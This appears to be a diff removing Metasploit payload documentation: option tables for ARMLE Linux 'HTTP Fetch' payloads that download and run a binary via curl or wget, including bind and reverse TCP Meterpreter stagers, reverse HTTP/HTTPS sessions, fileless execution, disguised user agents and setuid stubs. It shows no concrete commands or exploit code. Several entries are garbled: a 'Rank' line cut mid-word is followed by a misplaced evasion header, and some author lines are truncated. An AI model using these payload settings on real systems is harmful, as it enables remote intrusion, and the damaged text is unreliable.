||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Brendan Watters
|
|
||||||
Spencer McIntyre
|
|
||||||
Jonathan Salwan
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
CMD yes The command string to execute
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME RehdCjIlUXKQ no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an ARMLE payload from an HTTP server.
|
|
||||||
Execute an arbitrary command
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,96 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch, Bind TCP Stager
|
|
||||||
Module: payload/cmd/linux/http/armle/meterpreter/bind_tcp
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 105
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Brendan Watters
|
|
||||||
Spencer McIntyre
|
|
||||||
Adam Cammack <adam_cammack@rapid7.com>
|
|
||||||
nemo <nemo@felinemenace.org>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
RHOST no The target address
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME jXmsYyvUo no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an ARMLE payload from an HTTP server.
|
|
||||||
Listen for a connection
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,102 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch, Reverse TCP Stager
|
|
||||||
Module: payload/cmd/linux/http/armle/meterpreter/reverse_tcp
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 105
|
|
||||||
Rank: Nor
|
|
||||||
Evasion options for payload/cmd/linux/http/armle/meterpreter/reverse_tcp:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
nemo <nemo@felinemenace.org>
|
|
||||||
tkmru
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST no Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME NElxiOYcd no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an ARMLE payload from an HTTP server.
|
|
||||||
Connect back to the attacker
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,104 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch
|
|
||||||
Module: payload/cmd/linux/http/armle/meterpreter_reverse_http
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 114
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
|
|
||||||
Evasion options for payload/cmd/linux/http/armle/meterpreter_reverse_http:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
cook@rapid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST no Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8080 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME XnlZncyaIRhL no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an ARMLE payload from an HTTP server.
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,106 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch
|
|
||||||
Module: payload/cmd/linux/http/armle/meterpreter_reverse_https
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 111
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
|
|
||||||
Evasion options for payload/cmd/linux/http/armle/meterpreter_reverse_https:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
ok@rapid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST no Local IP to use for serving payload
|
|
||||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
|
||||||
FETCH_URIPATH no Local URI to use for serving payload
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8443 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_COMMAND is one of CURL,WGET:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
|
||||||
|
|
||||||
|
|
||||||
When FETCH_FILELESS is none:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_FILENAME wAhDSkfiYAV no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
|
||||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Fetch and execute an ARMLE payload from an HTTP server.
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
|
||||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
|
||||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
|
||||||
EXE::Inject false no Set to preserve the original EXE function
|
|
||||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
|
||||||
EXE::Path no The directory in which to look for the executable template
|
|
||||||
EXE::Template no The executable template file name.
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
FetchHandlerDisable false yes Disable fetch handler
|
|
||||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
|
||||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
|
||||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
|
||||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
|
||||||
MSI::Path no The directory in which to look for the msi template
|
|
||||||
MSI::Template no The msi template file name
|
|
||||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,97 +0,0 @@
|
|||||||
|
|
||||||
Name: HTTP Fetch
|
|
||||||
Module: payload/cmd/linux/http/armle/meterpreter_reverse_tcp
|
|
||||||
Platform: Linux
|
|
||||||
Arch: cmd
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 105
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Brendan Watters
|
|
||||||
Spencer McIntyre
|
|
||||||
Adam Cammack <adam_cammack@rapid7.com>
|
|
||||||
Brent Cook <brent_cook@rapid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
|
||||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
|
||||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
|
||||||
FETCH_SRVHOST no Local IP to use for serving payload
|
|
||||||
